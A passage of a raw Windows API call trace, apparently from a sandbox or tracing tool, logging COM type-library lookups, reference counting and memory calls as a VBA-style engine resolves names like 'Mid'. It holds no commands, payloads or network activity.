[7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.963] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.963] IUnknown:Release (This=0x7f72500) returned 0x2 [0046.963] IUnknown:AddRef (This=0x8128768) returned 0x4 [0046.963] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.963] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.963] IUnknown:Release (This=0x8128768) returned 0x3 [0046.963] IUnknown:AddRef (This=0x81287c0) returned 0x3 [0046.963] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.963] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.963] IUnknown:Release (This=0x81287c0) returned 0x2 [0046.963] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0046.963] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.964] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.964] IUnknown:Release (This=0x7f72088) returned 0x3 [0046.964] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0046.964] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.964] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.964] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.964] IUnknown:AddRef (This=0x7f723a0) returned 0x7 [0046.964] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.964] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.964] IUnknown:Release (This=0x7f723a0) returned 0x6 [0046.964] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0046.964] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.964] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.964] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0046.964] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0046.964] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.964] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.964] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0046.964] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0046.964] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac8 | out: ppvObject=0x205ac8*=0x0) returned 0x80004002 [0046.964] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ac0 | out: ppvObject=0x205ac0*=0x0) returned 0x80004002 [0046.964] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0046.964] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0046.965] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204628 | out: ppvObject=0x204628*=0x0) returned 0x80004002 [0046.965] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204620 | out: ppvObject=0x204620*=0x0) returned 0x80004002 [0046.965] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.965] IUnknown:Release (This=0x7f72088) returned 0x3 [0046.965] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0046.965] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.965] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044b8 | out: ppvObject=0x2044b8*=0x0) returned 0x80004002 [0046.965] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044b0 | out: ppvObject=0x2044b0*=0x0) returned 0x80004002 [0046.965] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044f0 | out: ppvObject=0x2044f0*=0x0) returned 0x80004002 [0046.965] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044f8 | out: ppvObject=0x2044f8*=0x0) returned 0x80004002 [0046.965] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x7f72088) returned 0x0 [0046.965] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204544 | out: pTypeKind=0x204544*=5) returned 0x0 [0046.965] IUnknown:Release (This=0x7f72088) returned 0x4 [0046.966] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203df0, pDummy=0x0 | out: ppTypeAttr=0x203df0, pDummy=0x0) returned 0x0 [0046.966] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0046.966] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x203df0, pDummy=0x6 | out: ppTypeAttr=0x203df0, pDummy=0x6) returned 0x0 [0046.966] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0046.966] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.966] IUnknown:Release (This=0x7f72088) returned 0x3 [0046.966] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0046.966] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x204708, pDummy=0x0 | out: ppTypeAttr=0x204708, pDummy=0x0) returned 0x0 [0046.966] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0046.966] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.966] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0046.966] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.966] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.966] GetCurrentProcess () returned 0xffffffffffffffff [0046.966] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0046.966] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0046.966] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203ca0, pDummy=0x0 | out: ppTypeAttr=0x203ca0, pDummy=0x0) returned 0x0 [0046.966] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0046.966] IUnknown:Release (This=0x7f723a0) returned 0x6 [0046.966] IUnknown:Release (This=0x7f722f0) returned 0x2 [0046.966] IUnknown:AddRef (This=0x7f723a0) returned 0x7 [0046.966] IUnknown:Release (This=0x7f723a0) returned 0x6 [0046.967] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204508 | out: ppvObject=0x204508*=0x0) returned 0x80004002 [0046.967] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204500 | out: ppvObject=0x204500*=0x0) returned 0x80004002 [0046.967] IUnknown:AddRef (This=0x7f723a0) returned 0x7 [0046.967] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204688, pDummy=0x3b010f0 | out: ppTypeAttr=0x204688, pDummy=0x3b010f0*=0x0) returned 0x0 [0046.967] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0046.967] IUnknown:Release (This=0x7f723a0) returned 0x6 [0046.967] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0046.967] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.967] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.967] GetCurrentProcess () returned 0xffffffffffffffff [0046.967] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0046.967] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0046.967] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203c20, pDummy=0x0 | out: ppTypeAttr=0x203c20, pDummy=0x0) returned 0x0 [0046.967] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0046.967] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0046.967] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0046.967] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204198 | out: ppvObject=0x204198*=0x0) returned 0x80004002 [0046.967] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0046.967] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204190, pDummy=0x10 | out: ppTypeAttr=0x204190, pDummy=0x10) returned 0x0 [0046.967] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0046.967] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204188 | out: pRefType=0x204188*=0x3) returned 0x0 [0046.967] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x2041a0 | out: ppTInfo=0x2041a0*=0x8137308) returned 0x0 [0046.967] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0046.967] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204190, pDummy=0x204168 | out: ppTypeAttr=0x204190, pDummy=0x204168*=0x3) returned 0x0 [0046.968] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0046.968] IUnknown:Release (This=0x8137308) returned 0x1 [0046.968] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x204210, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0046.968] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0046.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x204120, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0046.968] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0046.968] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0046.968] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204220 | out: ppvObject=0x204220*=0x0) returned 0x80004002 [0046.968] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0046.968] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204478, pDummy=0x3b011b0 | out: ppTypeAttr=0x204478, pDummy=0x3b011b0*=0x4) returned 0x0 [0046.968] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0046.968] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0046.968] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0046.968] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.968] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.968] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.968] GetCurrentProcess () returned 0xffffffffffffffff [0046.968] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0046.968] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0046.968] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203a10, pDummy=0x0 | out: ppTypeAttr=0x203a10, pDummy=0x0) returned 0x0 [0046.968] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0046.968] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0046.968] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0046.968] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0046.968] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0046.968] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204508 | out: ppvObject=0x204508*=0x0) returned 0x80004002 [0046.969] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204500 | out: ppvObject=0x204500*=0x0) returned 0x80004002 [0046.969] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0046.969] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204758, pDummy=0x3b014b0 | out: ppTypeAttr=0x204758, pDummy=0x3b014b0*=0x4) returned 0x0 [0046.969] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0046.969] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0046.969] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0046.969] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.969] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.969] GetCurrentProcess () returned 0xffffffffffffffff [0046.969] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0046.969] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0046.969] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203cf0, pDummy=0x0 | out: ppTypeAttr=0x203cf0, pDummy=0x0) returned 0x0 [0046.969] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0046.969] IMalloc:Realloc (This=0x7feff045380, pv=0x81f6280, cb=0x1000) returned 0x8142e00 [0046.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d133a, cbMultiByte=4, lpWideCharStr=0x2043d0, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0046.969] ITypeComp:RemoteBind (in: This=0x7edf750, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x204388, pDescKind=0x20439c, ppFuncDesc=0x2043a0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204388*=0x0, pDescKind=0x20439c*=0, ppFuncDesc=0x2043a0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d133a, cbMultiByte=4, lpWideCharStr=0x2043d0, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0046.969] ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x204388, pDescKind=0x20439c, ppFuncDesc=0x2043a0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204388*=0x0, pDescKind=0x20439c*=0, ppFuncDesc=0x2043a0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d133a, cbMultiByte=4, lpWideCharStr=0x2043d0, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0046.969] ITypeComp:RemoteBind (in: This=0x7ee0560, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x204388, pDescKind=0x20439c, ppFuncDesc=0x2043a0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204388*=0x0, pDescKind=0x20439c*=0, ppFuncDesc=0x2043a0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.969] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0046.970] ITypeComp:RemoteBind (in: This=0x7edffc0, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x204388, pDescKind=0x20439c, ppFuncDesc=0x2043a0, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204388*=0x0, pDescKind=0x20439c*=0, ppFuncDesc=0x2043a0, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.970] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x817bfb0 [0046.970] _mbscpy_s (in: _Dst=0x817bfb0, _DstSizeInBytes=0x4, _Src=0x30d133a | out: _Dst=0x817bfb0) returned 0x0 [0046.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0046.970] strcpy_s (in: _Dst=0x2044e0, _DstSize=0xb, _Src="_B_var_Mid" | out: _Dst="_B_var_Mid") returned 0x0 [0046.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2044e0, cbMultiByte=11, lpWideCharStr=0x204330, cchWideChar=11 | out: lpWideCharStr="_B_var_Mid") returned 11 [0046.970] IUnknown:AddRef (This=0x7edf740) returned 0xd [0046.970] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_B_var_Mid", lHashVal=0x1070ed, pfName=0x204400, pBstrLibName=0x204330 | out: pfName=0x204400*=1, pBstrLibName=0x204330) returned 0x0 [0046.970] IUnknown:Release (This=0x7edf740) returned 0xc [0046.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Mid", cchWideChar=-1, lpMultiByteStr=0x2044e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Mid", lpUsedDefaultChar=0x0) returned 11 [0046.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0046.970] IUnknown:AddRef (This=0x7edf740) returned 0xd [0046.970] IUnknown:Release (This=0x7edf740) returned 0xc [0046.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f055e, cbMultiByte=11, lpWideCharStr=0x204390, cchWideChar=12 | out: lpWideCharStr="_B_var_Mid") returned 11 [0046.970] ITypeComp:RemoteBind (in: This=0x7edf750, szName="_B_var_Mid", lHashVal=0x1070ed, wFlags=0x3, ppTInfo=0x204348, pDescKind=0x20435c, ppFuncDesc=0x204360, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204348*=0x8128768, pDescKind=0x20435c*=1, ppFuncDesc=0x204360, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.970] ITypeInfo:RemoteGetTypeAttr (in: This=0x8128768, ppTypeAttr=0x204350, pDummy=0x1 | out: ppTypeAttr=0x204350, pDummy=0x1) returned 0x0 [0046.970] ITypeInfo:LocalReleaseTypeAttr (This=0x8128768) returned 0x0 [0046.970] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2041b0 | out: ppvObject=0x2041b0*=0x8128768) returned 0x0 [0046.970] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x8128768, memid=1610612742, invkind=1, pFuncIndex=0x2041f0 | out: pFuncIndex=0x2041f0*=0x6) returned 0x0 [0046.970] ITypeInfo2:GetFuncCustData (in: This=0x8128768, index=0x6, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204208 | out: pVarVal=0x204208*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x1070ed)) returned 0x0 [0046.970] IUnknown:Release (This=0x8128768) returned 0x4 [0046.970] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.970] ITypeInfo:LocalReleaseFuncDesc (This=0x8128768) returned 0x0 [0046.970] IUnknown:Release (This=0x8128768) returned 0x4 [0046.970] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204408 | out: ppvObject=0x204408*=0x0) returned 0x80004002 [0046.970] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.970] IUnknown:Release (This=0x8128768) returned 0x4 [0046.970] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204628 | out: ppvObject=0x204628*=0x0) returned 0x80004002 [0046.970] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204620 | out: ppvObject=0x204620*=0x0) returned 0x80004002 [0046.971] IMalloc:Free (This=0x7feff045380, pv=0x817bfb0) [0046.971] 